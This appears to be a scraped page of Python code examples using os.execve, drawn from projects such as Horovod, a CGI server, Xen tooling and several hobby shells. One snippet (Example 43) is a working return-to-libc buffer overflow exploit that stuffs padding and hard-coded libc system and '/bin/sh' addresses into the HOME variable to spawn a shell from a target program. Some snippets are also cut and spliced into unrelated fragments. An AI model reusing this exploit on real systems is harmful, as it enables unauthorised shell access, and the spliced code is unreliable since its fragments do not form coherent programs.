            new_env["BULKERPROMPT"] = ps1

        new_env["BULKERSHELLRC"] = shell_rc

        if strict:
            for k in bulker_config.bulker.envvars:
                new_env[k] = os.environ.get(k, "")

        if os.path.basename(shellpath) == "bash":
            if strict:
                rcfile = mkabs(bulker_config.bulker.rcfile_strict,
                               os.path.dirname(bulker_config._file_path))
            else:
                rcfile = mkabs(bulker_config.bulker.rcfile,
                               os.path.dirname(bulker_config._file_path))

            shell_list.append("--rcfile")
            shell_list.append(rcfile)
            _LOGGER.debug("rcfile: {}".format(rcfile))
            _LOGGER.debug(shell_list)

        if os.path.basename(shellpath) == "zsh":
            if strict:
                rcfolder = mkabs(
                    os.path.join(
                        os.path.dirname(bulker_config.bulker.rcfile_strict),
                        "zsh_start_strict"),
                    os.path.dirname(bulker_config._file_path))
            else:
                rcfolder = mkabs(
                    os.path.join(
                        os.path.dirname(bulker_config.bulker.rcfile_strict),
                        "zsh_start"),
                    os.path.dirname(bulker_config._file_path))

            new_env["ZDOTDIR"] = rcfolder
            _LOGGER.debug("ZDOTDIR: {}".format(new_env["ZDOTDIR"]))

        _LOGGER.debug(new_env)
        #os.execv(shell_list[0], shell_list[1:])
        os.execve(shell_list[0], shell_list[1:], env=new_env)
Example #32
def js_run(settings, nics, env, command, stdout=None, stderr=None):
    """
    Runs Horovod with jsrun.

    Args:
        settings: Settings for running jsrun.
                  Note: settings.num_proc and settings.hosts must not be None.
        nics: Interfaces to include by jsrun.
        env: Environment dictionary to use for running jsrun.
        command: Command and arguments to run as a list of string.
        stdout: Stdout of the mpi process.
                Only used when settings.run_func_mode is True.
        stderr: Stderr of the mpi process.
                Only used when settings.run_func_mode is True.
    """
    mpi_impl_flags, _ = _get_mpi_implementation_flags(settings.tcp_flag)
    if mpi_impl_flags is None:
        raise Exception(_MPI_NOT_FOUND_ERROR_MSG)

    if not is_jsrun_installed():
        raise Exception(
            'horovod does not find the jsrun command.\n\n'
            'Please, make sure you are running on a cluster with jsrun installed or '
            'use one of the other launchers.')

    if nics and 'NCCL_SOCKET_IFNAME' not in env:
        env['NCCL_SOCKET_IFNAME'] = ','.join(nics)

    smpiargs = ' '.join(mpi_impl_flags)
    if settings.extra_mpi_args:
        smpiargs += ' ' + settings.extra_mpi_args

    if settings.binding_args:
        binding_args = settings.binding_args
    else:
        rf = generate_jsrun_rankfile(settings)
        if settings.verbose >= 2:
            safe_shell_exec.execute('cat {rf}'.format(rf=rf))
        binding_args = '--erf_input {rf}'.format(rf=rf)

    jsrun_command = (
        'jsrun {binding_args} '
        '{output_filename_arg} '
        '{smpiargs} '
        '{command}'.format(
            binding_args=binding_args,
            output_filename_arg='--stdio_stderr {file} --stdio_stdout {file}'.
            format(file=settings.output_filename)
            if settings.output_filename else '',
            smpiargs='--smpiargs {args}'.format(
                args=quote(smpiargs)) if smpiargs else '',
            command=' '.join(quote(par) for par in command)))

    if settings.verbose >= 2:
        print(jsrun_command)

    # Execute the jsrun command.
    if settings.run_func_mode:
        exit_code = safe_shell_exec.execute(jsrun_command,
                                            env=env,
                                            stdout=stdout,
                                            stderr=stderr)
        if exit_code != 0:
            raise RuntimeError(
                "jsrun failed with exit code {exit_code}".format(
                    exit_code=exit_code))
    else:
        os.execve('/bin/sh', ['/bin/sh', '-c', jsrun_command], env)
Example #33
def do_child(executable, args, env):
    os.execve(executable, [executable] + args, env)
Example #34
#!/usr/bin/pypy
# This file is meant as an executable script for running applets.
# BuildApplet will use it as the main executable in the .app bundle if
# we are not running in a framework build.

from warnings import warnpy3k
warnpy3k("In 3.x, the appletrunner module is removed.", stacklevel=2)

import os
import sys
for name in [
        "__rawmain__.py", "__rawmain__.pyc", "__main__.py", "__main__.pyc"
]:
    realmain = os.path.join(os.path.dirname(os.path.dirname(sys.argv[0])),
                            "Resources", name)
    if os.path.exists(realmain):
        break
else:
    sys.stderr.write("%s: cannot find applet main program\n" % sys.argv[0])
    sys.exit(1)
sys.argv.insert(1, realmain)
os.execve(sys.executable, sys.argv, os.environ)
Example #35
 def execve():
     os.execve(args[0], args, os.environ)
Example #36
 def exec_(self, *args, **kwargs):
     background = kwargs.pop('background', None)
     cmd, env = self.prepare_command(*args, **kwargs)
     if background:
         utils.daemonize()
     os.execve(cmd[0], cmd, env)
Example #37
def main(main_name):
    """The main entry point to the bootstrapper. Call this with the module name to
  use as your main app."""
    if sys.platform == 'darwin':
        if ('--curses' in sys.argv):
            sys.argv.insert(1, '--main-name')
            sys.argv.insert(2, main_name)
            sys.exit(run())

        if ('--objc' in sys.argv) and ('--triedenv'
                                       not in sys.argv) and ('--triedarch'
                                                             not in sys.argv):
            import bootstrap_objc
            bootstrap_objc.try_to_exec_stub(main_name)

        # To use wx-widgets on darwin, we need to be in 32 bit mode. Import of wx
        # will fail if you run python in 64 bit mode, which is default in 10.6+. :'(
        # It is depressingly hard to force python into 32 bit mode reliably across
        # computers, for some reason. So, we try two approaches known to work... one
        # after the other.
        wx_found_but_failed = False
        try:
            import wx
        except ImportError:
            if str(sys.exc_value).find("no appropriate 64-bit"):
                wx_found_but_failed = True

        if wx_found_but_failed:
            # try using the versioner trick
            if '--triedenv' not in sys.argv:
                os.putenv('VERSIONER_PYTHON_PREFER_32_BIT', 'yes')
                args = [sys.executable, sys.argv[0], '--triedenv']
                args.extend(sys.argv[1:])
                os.execve(args[0], args, os.environ)

            # last chance...
            if '--triedarch' not in sys.argv:
                args = [
                    "/usr/bin/arch", "-i386", sys.executable, sys.argv[0],
                    '--triedarch'
                ]
                args.extend(sys.argv[1:])
                os.execv(args[0], args)

            # did we already try one of the tricks below? Bail out to prevent recursion...
            print "Your system's python is 64 bit, and all the tricks we know to get it into 32b mode failed."
            sys.exit(255)

        else:
            try:
                sys.argv.remove('--triedenv')
            except:
                pass
            try:
                sys.argv.remove('--triedarch')
            except:
                pass
            sys.argv.insert(1, '--main-name')
            sys.argv.insert(2, main_name)
            sys.exit(run())

    else:
        sys.argv.insert(1, '--main-name')
        sys.argv.insert(2, main_name)
        sys.exit(run())
Example #38
# See https://docs.python.org/3/library/os.html
cmd = "ls -l"
os.system(cmd)  # Noncompliant
mode = os.P_WAIT
file = "ls"
path = "/bin/ls"
env = os.environ
os.spawnl(mode, path, *params)  # Noncompliant
os.spawnle(mode, path, *params, env)  # Noncompliant
os.spawnlp(mode, file, *params)  # Noncompliant
os.spawnlpe(mode, file, *params, env)  # Noncompliant
os.spawnv(mode, path, params)  # Noncompliant
os.spawnve(mode, path, params, env)  # Noncompliant
os.spawnvp(mode, file, params)  # Noncompliant
os.spawnvpe(mode, file, params, env)  # Noncompliant
mode = 'r'
(child_stdout) = os.popen(cmd, mode, 1)  # Noncompliant

# print(child_stdout.read())
(_, output) = subprocess.getstatusoutput(cmd)  # Noncompliant
out = subprocess.getoutput(cmd)  # Noncompliant
os.startfile(path)  # Noncompliant
os.execl(path, *params)  # Noncompliant
os.execle(path, *params, env)  # Noncompliant
os.execlp(file, *params)  # Noncompliant
os.execlpe(file, *params, env)  # Noncompliant
os.execv(path, params)  # Noncompliant
os.execve(path, params, env)  # Noncompliant
os.execvp(file, params)  # Noncompliant
os.execvpe(file, params, env)  # Noncompliant
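These calls are flagged because they hand a command (and often a shell) data that may be attacker-controlled. One commonly recommended pattern, sketched here under the assumption that the command and its arguments are fixed, is an explicit argument list passed to subprocess.run with no shell involved:

import subprocess

# Fixed argument list, no shell, so shell metacharacters in data cannot inject commands.
result = subprocess.run(["ls", "-l"], capture_output=True, text=True, check=False)
print(result.stdout)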
Example #39
    def run_cgi(self):
        """Execute a CGI script."""
        dir, rest = self.cgi_info
        i = rest.rfind('?')
        if i >= 0:
            rest, query = rest[:i], rest[i+1:]
        else:
            query = ''
        i = rest.find('/')
        if i >= 0:
            script, rest = rest[:i], rest[i:]
        else:
            script, rest = rest, ''
        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(404, "No such CGI script (%s)" % `scriptname`)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(403, "CGI script is not a plain file (%s)" %
                            `scriptname`)
            return
        ispy = self.is_python(scriptname)
        if not ispy:
            if not (self.have_fork or self.have_popen2 or self.have_popen3):
                self.send_error(403, "CGI script is not a Python script (%s)" %
                                `scriptname`)
                return
            if not self.is_executable(scriptfile):
                self.send_error(403, "CGI script is not executable (%s)" %
                                `scriptname`)
                return

        # Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
        # XXX Much of the following could be prepared ahead of time!
        env = {}
        env['SERVER_SOFTWARE'] = self.version_string()
        env['SERVER_NAME'] = self.server.server_name
        env['GATEWAY_INTERFACE'] = 'CGI/1.1'
        env['SERVER_PROTOCOL'] = self.protocol_version
        env['SERVER_PORT'] = str(self.server.server_port)
        env['REQUEST_METHOD'] = self.command
        uqrest = urllib.unquote(rest)
        env['PATH_INFO'] = uqrest
        env['PATH_TRANSLATED'] = self.translate_path(uqrest)
        env['SCRIPT_NAME'] = scriptname
        if query:
            env['QUERY_STRING'] = query
        host = self.address_string()
        if host != self.client_address[0]:
            env['REMOTE_HOST'] = host
        env['REMOTE_ADDR'] = self.client_address[0]
        # XXX AUTH_TYPE
        # XXX REMOTE_USER
        # XXX REMOTE_IDENT
        if self.headers.typeheader is None:
            env['CONTENT_TYPE'] = self.headers.type
        else:
            env['CONTENT_TYPE'] = self.headers.typeheader
        length = self.headers.getheader('content-length')
        if length:
            env['CONTENT_LENGTH'] = length
        accept = []
        for line in self.headers.getallmatchingheaders('accept'):
            if line[:1] in "\t\n\r ":
                accept.append(line.strip())
            else:
                accept = accept + line[7:].split(',')
        env['HTTP_ACCEPT'] = ','.join(accept)
        ua = self.headers.getheader('user-agent')
        if ua:
            env['HTTP_USER_AGENT'] = ua
        co = filter(None, self.headers.getheaders('cookie'))
        if co:
            env['HTTP_COOKIE'] = ', '.join(co)
        # XXX Other HTTP_* headers
        if not self.have_fork:
            # Since we're setting the env in the parent, provide empty
            # values to override previously set values
            for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
                      'HTTP_USER_AGENT', 'HTTP_COOKIE'):
                env.setdefault(k, "")
        os.environ.update(env)

        self.send_response(200, "Script output follows")

        decoded_query = query.replace('+', ' ')

        if self.have_fork:
            # Unix -- fork as we should
            args = [script]
            if '=' not in decoded_query:
                args.append(decoded_query)
            nobody = nobody_uid()
            self.wfile.flush() # Always flush before forking
            pid = os.fork()
            if pid != 0:
                # Parent
                pid, sts = os.waitpid(pid, 0)
                # throw away additional data [see bug #427345]
                while select.select([self.rfile], [], [], 0)[0]:
                    if not self.rfile.read(1):
                        break
                if sts:
                    self.log_error("CGI script exit status %#x", sts)
                return
            # Child
            try:
                try:
                    os.setuid(nobody)
                except os.error:
                    pass
                os.dup2(self.rfile.fileno(), 0)
                os.dup2(self.wfile.fileno(), 1)
                os.execve(scriptfile, args, os.environ)
            except:
                self.server.handle_error(self.request, self.client_address)
                os._exit(127)

        elif self.have_popen2 or self.have_popen3:
            # Windows -- use popen2 or popen3 to create a subprocess
            import shutil
            if self.have_popen3:
                popenx = os.popen3
            else:
                popenx = os.popen2
            cmdline = scriptfile
            if self.is_python(scriptfile):
                interp = sys.executable
                if interp.lower().endswith("w.exe"):
                    # On Windows, use python.exe, not pythonw.exe
                    interp = interp[:-5] + interp[-4:]
                cmdline = "%s -u %s" % (interp, cmdline)
            if '=' not in query and '"' not in query:
                cmdline = '%s "%s"' % (cmdline, query)
            self.log_message("command: %s", cmdline)
            try:
                nbytes = int(length)
            except (TypeError, ValueError):
                nbytes = 0
            files = popenx(cmdline, 'b')
            fi = files[0]
            fo = files[1]
            if self.have_popen3:
                fe = files[2]
            if self.command.lower() == "post" and nbytes > 0:
                data = self.rfile.read(nbytes)
                fi.write(data)
            # throw away additional data [see bug #427345]
            while select.select([self.rfile._sock], [], [], 0)[0]:
                if not self.rfile._sock.recv(1):
                    break
            fi.close()
            shutil.copyfileobj(fo, self.wfile)
            if self.have_popen3:
                errors = fe.read()
                fe.close()
                if errors:
                    self.log_error('%s', errors)
            sts = fo.close()
            if sts:
                self.log_error("CGI script exit status %#x", sts)
            else:
                self.log_message("CGI script exited OK")

        else:
            # Other O.S. -- execute script in this process
            save_argv = sys.argv
            save_stdin = sys.stdin
            save_stdout = sys.stdout
            save_stderr = sys.stderr
            try:
                try:
                    sys.argv = [scriptfile]
                    if '=' not in decoded_query:
                        sys.argv.append(decoded_query)
                    sys.stdout = self.wfile
                    sys.stdin = self.rfile
                    execfile(scriptfile, {"__name__": "__main__"})
                finally:
                    sys.argv = save_argv
                    sys.stdin = save_stdin
                    sys.stdout = save_stdout
                    sys.stderr = save_stderr
            except SystemExit, sts:
                self.log_error("CGI script exit status %s", str(sts))
            else:
                self.log_message("CGI script exited OK")
            os.write(2, ("Error: File not found...").encode())

    else:
        rc = os.fork()  #forks a child process

        if rc < 0:
            os.write(2, ("Fork failed %d\n" % rc).encode())
            sys.exit(1)

        elif rc == 0:
            if '|' in args:
                pipe(args)
            if '>' in args:
                out_redir(args)
            elif '<' in args:
                in_redir(args)
            else:
                for dir in re.split(":",
                                    os.environ['PATH']):  #try each directory
                    program = "%s/%s" % (dir, args[0])
                    try:
                        os.execve(program, args,
                                  os.environ)  #try to execute program
                    except FileNotFoundError:
                        pass
                os.write(2, ("Command not found\n").encode())
                sys.exit(1)
        else:
            child_pid = os.wait()  #waiting for child to finish
Example #41
    if not l:
        break
    k, v = l.split(b"=", maxsplit=1)
    env[k] = v

ESC = '\033[{0}m'
esc = ESC.format

OFF, BOLD, UNDERSCORE, BLINK = 0, 1, 4, 5
BLACK, BLACKBG = 30, 40
RED, REDBG = 31, 41
GREEN, GREENBG = 32, 42
YELLOW, YELLOWBG = 33, 43
BLUE, BLUEBG = 34, 44
MAGENTA, MAGENTABG = 35, 45
CYAN, CYANBG = 36, 46
WHITE, WHITEBG = 37, 47

newps1 = "{loud}<aws-vault env {env}>{quiet} {ps1}".format(
    loud=esc(MAGENTABG) + esc(BLACK),
    quiet=esc(OFF),
    env=vaultenv,
    ps1=env.get("PS1", "$"))
args = ()
if shtype == "bash":
    env["PROMPT_COMMAND"] = 'PS1="{newps1}";unset PROMPT_COMMAND'.format(
        newps1=newps1)
elif shtype == "zsh":
    pass
os.execve(sh, args, env)
Example #42
def run():
    args = parse_args()

    if args.version:
        print(horovod.__version__)
        exit(0)

    if args.host:
        all_host_names = [
            x for x in [y.split(':')[0] for y in args.host.split(',')]
        ]
    else:
        all_host_names = []

    # horovodrun has to finish all the checks before this timeout runs out.
    if args.start_timeout:
        start_timeout = args.start_timeout
    else:
        # Lookup default timeout from the environment variable.
        start_timeout = int(os.getenv('HOROVOD_START_TIMEOUT', '600'))

    settings = hvd_settings.Settings(verbose=args.verbose,
                                     ssh_port=args.ssh_port,
                                     key=secret.make_secret_key(),
                                     timeout=timeout.Timeout(start_timeout),
                                     num_hosts=len(all_host_names),
                                     num_proc=args.np)

    # This cache stores the results of checks performed by horovodrun
    # during the initialization step. It can be disabled by setting
    # --disable-cache flag.
    fn_cache = None
    if not args.disable_cache:
        params = ''
        if args.np:
            params += str(args.np) + ' '
        if args.host:
            params += str(args.host) + ' '
        if args.ssh_port:
            params += str(args.ssh_port)
        parameters_hash = hashlib.md5(params.encode('utf-8')).hexdigest()
        fn_cache = cache.Cache(CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES,
                               parameters_hash)

    remote_host_names = []
    if args.host:
        if settings.verbose >= 1:
            print("Filtering local host names.")
        remote_host_names = network.filter_local_addresses(all_host_names)

        if len(remote_host_names) > 0:
            if settings.verbose >= 1:
                print("Checking ssh on all remote hosts.")
            # Check if we can ssh into all remote hosts successfully.
            _check_all_hosts_ssh_successful(remote_host_names,
                                            args.ssh_port,
                                            fn_cache=fn_cache)
            if settings.verbose >= 1:
                print("SSH was successful into all the remote hosts.")

        hosts_arg = "-H {hosts}".format(hosts=args.host)
    else:
        # if user does not specify any hosts, mpirun by default uses local host.
        # There is no need to specify localhost.
        hosts_arg = ""

    if args.host and len(remote_host_names) > 0:
        if settings.verbose >= 1:
            print("Testing interfaces on all the hosts.")

        local_host_names = set(all_host_names) - set(remote_host_names)
        # Find the set of common, routed interfaces on all the hosts (remote
        # and local) and specify it in the args to be used by NCCL. It is
        # expected that the following function will find at least one interface
        # otherwise, it will raise an exception.
        common_intfs = _driver_fn(all_host_names,
                                  local_host_names,
                                  settings,
                                  fn_cache=fn_cache)

        tcp_intf_arg = "-mca btl_tcp_if_include {common_intfs}".format(
            common_intfs=','.join(common_intfs))
        nccl_socket_intf_arg = "-x NCCL_SOCKET_IFNAME={common_intfs}".format(
            common_intfs=','.join(common_intfs))

        if settings.verbose >= 1:
            print("Interfaces on all the hosts were successfully checked.")
    else:
        # If all the given hosts are local, no need to specify the interfaces
        # because MPI does not use network for local execution.
        tcp_intf_arg = ""
        nccl_socket_intf_arg = ""

    # Pass all the env variables to the mpirun command.
    env = os.environ.copy()

    # Pass secret key through the environment variables.
    env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)

    if not _is_open_mpi_installed():
        raise Exception(
            'horovodrun convenience script currently only supports '
            'Open MPI.\n\n'
            'Choose one of:\n'
            '1. Install Open MPI 4.0.0+ and re-install Horovod '
            '(use --no-cache-dir pip option).\n'
            '2. Run distributed '
            'training script using the standard way provided by your'
            ' MPI distribution (usually mpirun, srun, or jsrun).')

    if args.ssh_port:
        ssh_port_arg = "-mca plm_rsh_args \"-p {ssh_port}\"".format(
            ssh_port=args.ssh_port)
    else:
        ssh_port_arg = ""

    mpirun_command = (
        'mpirun --allow-run-as-root --tag-output '
        '-np {num_proc} {hosts_arg} '
        '-bind-to none -map-by slot '
        '-mca pml ob1 -mca btl ^openib '
        '{ssh_port_arg} '
        '{tcp_intf_arg} '
        '-x NCCL_DEBUG=INFO '
        '{nccl_socket_intf_arg} '
        '{env} {command}'  # expect a lot of environment variables
        .format(num_proc=settings.num_proc,
                hosts_arg=hosts_arg,
                tcp_intf_arg=tcp_intf_arg,
                nccl_socket_intf_arg=nccl_socket_intf_arg,
                ssh_port_arg=ssh_port_arg,
                env=' '.join('-x %s' % key for key in env.keys()
                             if env_util.is_exportable(key)),
                command=' '.join(quote(par) for par in args.command)))

    if settings.verbose >= 1:
        print(mpirun_command)
    # Execute the mpirun command.
    os.execve('/bin/sh', ['/bin/sh', '-c', mpirun_command], env)
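
A minimal sketch of the exec-through-a-shell pattern used above, independent of Horovod: copy the environment, overlay extra variables, and hand the formatted command line to /bin/sh via os.execve. The helper name and the example command are assumptions for illustration only.

import os
from shlex import quote


def exec_via_shell(command_parts, extra_env=None):
    # Start from the current environment and overlay any extra variables.
    env = os.environ.copy()
    env.update(extra_env or {})
    cmdline = ' '.join(quote(part) for part in command_parts)
    # os.execve replaces this process; it only comes back if the exec fails.
    os.execve('/bin/sh', ['/bin/sh', '-c', cmdline], env)


# exec_via_shell(['echo', 'hello'], extra_env={'NCCL_DEBUG': 'INFO'})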
Ejemplo n.º 43
0
import os
from struct import pack

libc_system = pack("<I", 0xf7db79e0)
libc_binsh = pack("<I", 0xf7ef7aaa)
libc_exit = pack("<I", 0xf7daaa60)
libc_printf = pack("<I", 0xf7dcb860)
libc_popret = pack("<I", 0xf7e76671)
ret = pack("<I", 0x804900a)
rop_popret = pack("<I", 0x804901e)

buffer = ''
buffer += "A" * 312
# system("/bin/sh")
buffer += libc_system
buffer += libc_popret
buffer += libc_binsh

buffer += rop_popret

# printf("/bin/sh")
buffer += libc_printf
buffer += libc_popret
buffer += libc_binsh

# exit()
buffer += libc_exit
buffer += ret

PROGNAME = "./dav"
os.environ['HOME'] = buffer
os.execve(PROGNAME, [PROGNAME], os.environ)
Ejemplo n.º 44
0
def child(args):
    pid: int = os.getpid()

    if '>' in args:  # Redirect the output. Reference: p4-redirect.py; see README
        os.close(1)
        sys.stdout = open(args[args.index('>') + 1], "w")
        fd = sys.stdout.fileno()
        os.set_inheritable(fd, True)
        args.remove(args[args.index('>') + 1])
        args.remove('>')

    if '<' in args:  # Redirect the input
        os.close(0)
        sys.stdin = open(args[args.index('<') + 1], "r")
        fd = sys.stdin.fileno()
        os.set_inheritable(fd, True)
        args.remove(args[args.index('<') + 1])
        args.remove('<')

    if '>>' in args:  # basic bash behavior: append output to a file in the shell
        os.close(1)
        sys.stdout = open(args[args.index('>>') + 1], "a")
        fd = sys.stdout.fileno()
        os.set_inheritable(fd, True)
        args.remove(args[args.index('>>') + 1])
        args.remove('>>')

    if '&' in args:  # removes the ampersand to kill a process in the shell; speeds up kill
        args.remove('&')

    if '|' in args:  # piping code fragment; see p5-pipe.py and README for reference.
        read, write = os.pipe()

        # Both pipe ends must survive the exec in the children.
        for i in (read, write):
            os.set_inheritable(i, True)
        os.write(2, ("Pipe: pr=%d pw=%d\n" % (read, write)).encode())

        rc = os.fork()
        if rc < 0:
            os.write(2, "Forking of child has failed.\n".encode())
        if rc == 0:
            pipeTheChild(args, read, write)
        if rc > 0:
            childPid = os.wait()
            os.close(0)
            os.dup(read)
            for fd in (read, write):
                os.close(fd)

            for inputLine in fileinput.input():
                os.write(2, ("Pipe child: %s" % inputLine).encode())

    if '/' in args[0]:  # an explicit path was given: exec it directly
        program = args[0]
        try:
            os.execve(program, args, os.environ)
        except FileNotFoundError:
            pass
        os.write(2, ("Child %d: could not execute %s\n" %
                     (pid, program)).encode())
        sys.exit(1)

    for directory in re.split(
            ":", os.environ['PATH']
    ):  # No path specified: tries each directory to find the program
        # Reference: p4-redirect.py
        # see README
        program = "%s/%s" % (directory, args[0])  # displays path of program
        try:
            os.execv(program, args)  # runs program
        except FileNotFoundError:
            pass
    os.write(2, ("Child %d: Could not exec %s \n" % (pid, program)).encode())
    sys.exit(1)
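
The function above ends with the classic PATH-search exec loop. A condensed, standalone sketch of that pattern (not part of the original shell; the helper name is made up for illustration):

import os
import sys


def exec_from_path(args):
    if '/' in args[0]:
        # An explicit path was given: try only that.
        candidates = [args[0]]
    else:
        # Otherwise try each directory on PATH in order.
        candidates = [os.path.join(d, args[0])
                      for d in os.environ.get('PATH', '').split(':')]
    for program in candidates:
        try:
            os.execve(program, args, os.environ)
        except FileNotFoundError:  # this candidate does not exist, keep looking
            pass
    os.write(2, ("could not exec %s\n" % args[0]).encode())
    sys.exit(1)


# exec_from_path(['ls', '-l'])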
Ejemplo n.º 45
0
    def run(self):

        self.shell_pid, master_fd = os.forkpty()
        if self.shell_pid == 0:
            for i in range(3, 1024):
                if i == master_fd:
                    continue
                try:
                    os.close(i)
                except Exception:
                    pass
            os.chdir('/root')
            cmd = [
                '/usr/local/bin/bash'
            ]

            if self.jail is not None:
                cmd = [
                    '/usr/local/bin/iocage',
                    'console',
                    self.jail
                ]
            os.execve(cmd[0], cmd, {
                'TERM': 'xterm',
                'HOME': '/root',
                'LANG': 'en_US.UTF-8',
                'PATH': '/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/root/bin',
            })

        def reader():
            """
            Reader thread for reading from pty file descriptor
            and forwarding it to the websocket.
            """
            while True:
                read = os.read(master_fd, 1024)
                if read == b'':
                    break
                asyncio.run_coroutine_threadsafe(
                    self.ws.send_str(read.decode('utf8')), loop=self.loop
                ).result()

        def writer():
            """
            Writer thread for reading from input_queue and write to
            the shell pty file descriptor.
            """
            while True:
                try:
                    get = self.input_queue.get(timeout=1)
                    os.write(master_fd, get)
                except queue.Empty:
                    # If we timeout waiting in input query lets make sure
                    # the shell process is still alive
                    try:
                        os.kill(self.shell_pid, 0)
                    except ProcessLookupError:
                        break

        t_reader = threading.Thread(target=reader, daemon=True)
        t_reader.start()

        t_writer = threading.Thread(target=writer, daemon=True)
        t_writer.start()

        # Wait for shell to exit
        while True:
            try:
                pid, rv = os.waitpid(self.shell_pid, os.WNOHANG)
            except ChildProcessError:
                break
            if self._die:
                return
            if pid <= 0:
                time.sleep(1)

        t_reader.join()
        t_writer.join()
        asyncio.run_coroutine_threadsafe(self.ws.close(), self.loop)
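
The run() method above relies on os.forkpty() so the spawned shell believes it is attached to a real terminal. A minimal, self-contained sketch of that pattern (command and environment are placeholders):

import os


def spawn_in_pty(cmd=('/bin/sh',)):
    pid, master_fd = os.forkpty()
    if pid == 0:
        # Child: stdin/stdout/stderr are already wired to the pty slave.
        try:
            os.execve(cmd[0], list(cmd), {'TERM': 'xterm', 'PATH': '/bin:/usr/bin'})
        finally:
            os._exit(127)  # reached only if execve failed
    # Parent: talk to the child through the pty master.
    return pid, master_fd


# pid, fd = spawn_in_pty()
# os.write(fd, b'echo hello\n')
# print(os.read(fd, 1024))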
Ejemplo n.º 46
0
]

STRIP_EXEC = "/usr/bin/strip"

#
# We're using a stock interpreter to run the app, yet we need
# a way to pass the Python main program to the interpreter. The
# bootstrapping script fires up the interpreter with the right
# arguments. os.execve() is used as OSX doesn't like us to
# start a real new process. Also, the executable name must match
# the CFBundleExecutable value in the Info.plist, so we lie
# deliberately with argv[0]. The actual Python executable is
# passed in an environment variable so we can "repair"
# sys.executable later.
#
BOOTSTRAP_SCRIPT = """\
#!%(hashbang)s

import sys, os
execdir = os.path.dirname(sys.argv[0])
executable = os.path.join(execdir, "%(executable)s")
resdir = os.path.join(os.path.dirname(execdir), "Resources")
libdir = os.path.join(os.path.dirname(execdir), "Frameworks")
mainprogram = os.path.join(resdir, "%(mainprogram)s")

if %(optimize)s:
    sys.argv.insert(1, '-O')

sys.argv.insert(1, mainprogram)
if %(standalone)s or %(semi_standalone)s:
    os.environ["PYTHONPATH"] = resdir
Ejemplo n.º 47
0
def loop_shell():
	global short
	
	while True:
		if 'PS1' in os.environ:
			os.write(1,(os.environ['PS1']).encode())
			try:
#				inp = os.read(0,256)
#				user_input = inp.decode().split()
				user_input = [str(n) for n in input().split()]
			except EOFError: 
				sys.exit(1)
		else:
			get_short()
			try:
#				inp = os.read(0,256)
#				user_input = inp.decode().split()
				user_input = [str(n) for n in input().split()]
			except EOFError: 
				sys.exit(1)
		w = True
		
		if not user_input:  # empty input: prompt again
			continue
		
		if user_input[0] == 'exit':
			sys.exit(1)
			
		if "cd" in user_input:#changes directory
			try:
				os.chdir(user_input[1])
			except FileNotFoundError:
				os.write(1, ("-bash: cd: %s: No such file or directory\n" % directory).encode())
			
			continue
			
		else:
			rc = os.fork()  
		
			if '&' in user_input:
				user_input.remove("&")
				w = False
				
			if user_input[0] == 'exit':
				quit(1)
				
			if rc < 0:
				os.write(2, ("fork failed, returning %d\n" % rc).encode())
				sys.exit(1)

			elif rc == 0:            
				if user_input[0].startswith("/"):
					try:
						os.execve(user_input[0], user_input, os.environ) # try to exec program
					except FileNotFoundError:
						pass 
				redirect(user_input)
				simple_pipe(user_input)
				execChild(user_input)
				
			else:                      
				if w: #wait
					code = os.wait() 
					if code[1] != 0 and code[1] != 256:
						os.write(2, ("Program terminated with exit code: %d\n" % code[1]).encode())
Ejemplo n.º 48
0
    if (a == None):
        temp = input("$ ")
        print("here 1")

    if (rc < 0):
        print("here 2")
        os.write(2, ("Fork failed, returning %d\n" % rc).encode())
        sys.exit(1)

    if (rc == 0):
        print("here 3")
        os.write(1, ("Child: My pid==%d. Parent's pid=%\n" %
                     (os.getpid(), pID)).encode())
        print("hi")
        args = [temp, "myShell.py"]

        for dir in re.split(":", os.environ['PATH']):
            print("here 4")
            program = "%s/%s" % (dir, args[0])

            os.write(1, ("Child: ...trying to exec %s\n" % program).encode())

            try:
                os.execve(program, args, os.environ)

            except FileNotFoundError:
                pass

        os.write(2, ("Child:  Could not exec %s\n" % args[0].encode()))
        sys.exit(1)
Ejemplo n.º 49
0
    def createDeviceModel(self, restore=False):
        if self.device_model is None:
            return
        if self.pid:
            return
        # Execute device model.
        #todo: Error handling
        args = self.getDeviceModelArgs(restore)
        env = dict(os.environ)
        if self.display:
            env['DISPLAY'] = self.display
        if self.xauthority:
            env['XAUTHORITY'] = self.xauthority
        unique_id = "%i-%i" % (self.vm.getDomid(), time.time())
        sentinel_path = sentinel_path_prefix + unique_id
        sentinel_path_fifo = sentinel_path + '.fifo'
        os.mkfifo(sentinel_path_fifo, 0600)
        sentinel_write = file(sentinel_path_fifo, 'r+')
        self._openSentinel(sentinel_path_fifo)
        self.vm.storeDom("image/device-model-fifo", sentinel_path_fifo)
        xstransact.Mkdir("/local/domain/0/device-model/%i" %
                         self.vm.getDomid())
        xstransact.SetPermissions(
            "/local/domain/0/device-model/%i" % self.vm.getDomid(), {
                'dom': self.vm.getDomid(),
                'read': True,
                'write': True
            })
        log.info("spawning device models: %s %s", self.device_model, args)
        # keep track of pid and spawned options to kill it later

        self.logfile = "/var/log/xen/qemu-dm-%s.log" % str(
            self.vm.info['name_label'])

        # rotate log
        logfile_mode = os.O_WRONLY | os.O_CREAT | os.O_APPEND
        logrotate_count = XendOptions.instance().get_qemu_dm_logrotate_count()
        if logrotate_count > 0:
            logfile_mode |= os.O_TRUNC
            if os.path.exists("%s.%d" % (self.logfile, logrotate_count)):
                os.unlink("%s.%d" % (self.logfile, logrotate_count))
            for n in range(logrotate_count - 1, 0, -1):
                if os.path.exists("%s.%d" % (self.logfile, n)):
                    os.rename("%s.%d" % (self.logfile, n),
                              "%s.%d" % (self.logfile, (n + 1)))
            if os.path.exists(self.logfile):
                os.rename(self.logfile, self.logfile + ".1")

        null = os.open("/dev/null", os.O_RDONLY)
        logfd = os.open(self.logfile, logfile_mode, 0666)

        sys.stderr.flush()
        contract = osdep.prefork("%s:%d" %
                                 (self.vm.getName(), self.vm.getDomid()))
        pid = os.fork()
        if pid == 0:  #child
            try:
                osdep.postfork(contract)
                os.dup2(null, 0)
                os.dup2(logfd, 1)
                os.dup2(logfd, 2)
                oshelp.close_fds((sentinel_write.fileno(), ))
